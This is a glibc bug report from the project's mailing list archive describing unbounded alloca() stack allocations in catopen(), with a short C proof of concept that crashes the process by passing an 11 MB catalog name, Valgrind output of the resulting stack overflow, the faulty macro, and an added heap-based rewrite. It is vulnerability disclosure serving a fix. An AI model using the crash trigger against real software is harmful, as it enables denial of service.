This is the mail archive of the glibc-bugs@sourceware.org mailing list for the glibc project.



[Bug libc/17905] New: catopen() Multiple unbounded stack allocations


https://sourceware.org/bugzilla/show_bug.cgi?id=17905

            Bug ID: 17905
           Summary: catopen() Multiple unbounded stack allocations
           Product: glibc
           Version: 2.20
            Status: NEW
          Severity: normal
          Priority: P2
         Component: libc
          Assignee: unassigned at sourceware dot org
          Reporter: max at cxib dot net
                CC: drepper.fsp at gmail dot com

Reference: 
https://sourceware.org/bugzilla/show_bug.cgi?id=17897

PoC:

#include <nl_types.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
        /* Catalog name of about 11 MB: catopen() copies it into alloca()'d
           buffers, so the stack is exhausted before any file is opened. */
        char *buff = malloc(11111111);
        if (buff == NULL)
                return 1;
        memset(buff, 'A', 11111110);
        buff[11111110] = '\0';

        catopen(buff, NL_CAT_LOCALE);

        free(buff);
        return 0;
}



========================

==25788== Memcheck, a memory error detector
==25788== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==25788== Using Valgrind-3.10.0.SVN and LibVEX; rerun with -h for copyright info
==25788== Command: ./cato
==25788== 
==25788== Warning: client switching stacks?  SP change: 0xfff000330 --> 0xffe567648
==25788==          to suppress, use: --max-stackframe=11111656 or greater
==25788== Invalid write of size 8
==25788==    at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788==    by 0x4E6C38E: catopen (catgets.c:71)
==25788==    by 0x400616: main (in /home/kalibaba/cato)
==25788==  Address 0xffe567648 is on thread 1's stack
==25788== 
==25788== 
==25788== Process terminating with default action of signal 11 (SIGSEGV)
==25788==  Access not within mapped region at address 0xFFE567648
==25788==    at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788==  If you believe this happened as a result of a stack
==25788==  overflow in your program's main thread (unlikely but
==25788==  possible), you can try to increase the size of the
==25788==  main thread stack using the --main-stacksize= flag.
==25788==  The main thread stack size used in this run was 8388608.


========================

open_catalog.c

#define ENOUGH(n)                                   \
  if (__builtin_expect (bufact + (n) >= bufmax, 0)) \
    {                                               \
      char *old_buf = buf;                          \
      bufmax += 256 + (n);                          \
      buf = (char *) alloca (bufmax);               \
<===============
      memcpy (buf, old_buf, bufact);                \
    }


and other alloca() calls in catopen()
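For comparison, an added example (not glibc's code and not the bug's eventual fix) of the same growth rule as ENOUGH with the alloca() replaced by heap allocation, so that an oversized catalog name grows the heap instead of the stack. The struct, function names, the 256-byte first buffer and the "/usr/share/locale/" directory are assumptions chosen for the example.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Heap-backed growable buffer; replaces the alloca()-based ENOUGH macro. */
struct growbuf { char *buf; size_t bufact, bufmax; int on_heap; };

/* Same trigger (bufact + n >= bufmax) and growth (256 + n) as ENOUGH, but
   the new block comes from malloc and the size arithmetic is checked. */
static int ensure_room(struct growbuf *g, size_t n)
{
    if (n < g->bufmax - g->bufact) return 0;      /* already enough room */
    if (n > SIZE_MAX - 256 - g->bufmax) return -1; /* size_t wraparound */
    size_t newmax = g->bufmax + 256 + n;
    char *nb = malloc(newmax);
    if (nb == NULL) return -1;
    memcpy(nb, g->buf, g->bufact);
    if (g->on_heap) free(g->buf);   /* first buffer is the caller's stack array */
    g->buf = nb; g->bufmax = newmax; g->on_heap = 1;
    return 0;
}

/* Appends len bytes of s plus a terminating NUL. */
static int append(struct growbuf *g, const char *s, size_t len)
{
    if (ensure_room(g, len + 1) != 0) return -1;
    memcpy(g->buf + g->bufact, s, len);
    g->bufact += len;
    g->buf[g->bufact] = '\0';
    return 0;
}

/* Builds "/usr/share/locale/<name>" for a constructed name of name_len 'A'
   bytes (the kind of path catopen() builds per NLSPATH entry); returns the
   resulting length, or -1 on allocation failure. */
long path_len_for_name(size_t name_len)
{
    char stackbuf[256];                   /* small first buffer on the stack */
    struct growbuf g = { stackbuf, 0, sizeof stackbuf, 0 };
    char *name = malloc(name_len + 1);    /* constructed input, like the PoC */
    long result = -1;
    if (name == NULL) return -1;
    memset(name, 'A', name_len);
    name[name_len] = '\0';
    if (append(&g, "/usr/share/locale/", 18) == 0 && append(&g, name, name_len) == 0)
        result = (long) g.bufact;
    free(name);
    if (g.on_heap) free(g.buf);
    return result;
}
```

With the PoC's 11111110-byte name the buffer moves to the heap once and the stack frame stays at its 256-byte array.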


